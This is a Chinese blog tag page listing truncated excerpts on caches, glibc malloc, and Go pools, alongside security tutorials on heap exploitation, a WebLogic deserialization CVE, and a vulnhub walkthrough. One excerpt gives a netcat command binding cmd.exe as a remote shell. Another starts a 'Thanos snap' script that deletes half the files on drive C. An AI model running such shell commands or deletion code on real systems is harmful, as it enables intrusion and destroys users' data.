首页 > TAG信息列表 > victim
15445第一阶段笔记+Buffer Pool(2019)
15445第一阶段笔记+Buffer Pool(2019) 概念 page与frame 块,页,是对同一概念的不同叫法,取决于场景不同。其表述的都是磁盘上某一柱面上的连续扇区(固定数目)。数据在磁盘和缓冲区(内存)之间传输,传输的单位就是块(页)。 内存区是以定长的页数组的形式组织的,其中每一个数组条目,被称为一Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html http://m【tcache stash unlink +】图解
tcache stashing unlink + tcache 的入链操作 smallbin 入链操作 tcache stash 源码 #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); ifglibc 2.31 malloc与free 源码分析(持续更新)
前言 对于 malloc 过程,以 __libc_malloc 函数为入口开始分析,对于 free 过程,以 __libc_malloc (size_t bytes) void * __libc_malloc (size_t bytes) { mstate ar_ptr; void *victim; _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2, "PTRDIFF_MAX is notGoroutine之sync.pool
sync.pool 前言使用源码GetPut 理解sync.poolvictim 前言 sync.Pool的核心作用 - 读源码,缓存稍后会频繁使用的对象+减轻GC压力sync.Pool的Put与Get - Put的顺序为local private-> local shared,Get的顺序为 local private -> local shared -> remote shared ->victim ->glibc2.29下unsortedbin_attack的替代方法
前言: 如今glibc已经发布了glibc 2.31版本,利用也变得越来越难,主要原因是新的版本中加入了更多的check,不过现在大多数的题目还是基于glibc2.23 2.27和2.29这3个版本。我们知道,glibc2.29相对于glibc2.23加入了更多的保护措施,而glibc2.29下对unsortedbin的保护措施相当于直接扼杀了uns串扰产生原因及解决办法
串扰产生原因及解决办法 Cross Talk 文章目录 串扰产生原因及解决办法一、串扰问题概述二、串扰产生原因三、串扰强度影响因素四、串扰的解决办法 一、串扰问题概述 随着工艺不断进步,金属互连线密度和金属层数不断增加,电源供电电压不断降低,时钟频率越来越快,串扰在信号完为什么Caffeine比Guava好?
1. 缓存淘汰算法1.1. FIFO先进先出:最先进入的缓存被最先淘汰掉,这个基本不会有人用来做缓存 1.2. LRU最近最少未使用:每次访问就把这个元素放到队列头部,队列满了淘汰队列尾的元素,也就是淘汰最长时间没有被访问的。 缺点也是很明显的,某一时刻大量数据的到来容易把热点数据挤出缓存Victim
Victim: 运行靶机 获取靶机IP地址为192.168.1.36 也可以打开kali进行IP地址扫描通过MAC地址进行判断IP地址 获取IP地址之后进行端口扫描 nmap 192.168.1.36 通过扫描结果得知 80和8080和9000三个端口开启并且可以访问 访问80端口 访问8080端口 访问9000端口 这三个端口访问Cache替换策略
LRU, Least Recently Used, LRU算法根据各block(cache line)使用的情况, 总是选择那个最长时间未被使用的block进行替换。这种策略比较好的反映了程序局部性规律。gem5中该替换策略的代码: void LRURP::invalidate(const std::shared_ptr<ReplacementData>& replacement_data) consthouse_of_storm 详解
house_of_storm 漏洞危害 House_of_storm 可以在任意地址写出chunk地址,进而把这个地址的高位当作size,可以进行任意地址分配chunk,也就是可以造成任意地址写的后果,危害十分之大。 House_of_storm 虽然危害之大,但是其条件也是非常的苛刻。 漏洞利用条件 glibc版本小于2.30,因为2.3python灭霸的响指
python灭霸的响指 闲来无事,做了个简单的snap小程序。可以在指定地点(C盘 )打响指,随机消灭一半的文件。自己试了试,感觉还蛮好玩。不多说了,我要赶紧抢救系统文件了。 import os import shutil import random def find_victim(universe): path_domain=os.listdir(universeOOM Killer机制
简介 这是Linux内核的一个机制, 用于监控占用内存过大, 尤其是瞬间占用内存很快的进程, 在内存将要耗尽时判断哪个进程最坏(打个分), 分最高就把它杀掉。 如何查看 shell(ubuntu18.04LTS看了下没有messages目录, CentOS7是有的) grep "Out of memory" /var/log/messages 触发Windows 反弹 Shell
NC 反弹 shell 攻击场景: Victim IP: 192.168.2.10 Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cmd服务,然后在攻击机上进行连接 反向 Shell Attacker:nc12.unsorted_bin_into_stack
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <stdint.h> 4 5 int main() { 6 intptr_t stack_buffer[4] = {0}; 7 8 fprintf(stderr, "Allocating the victim chunk\n"); 9 intptr_t* victim = malloc(0x100);10 11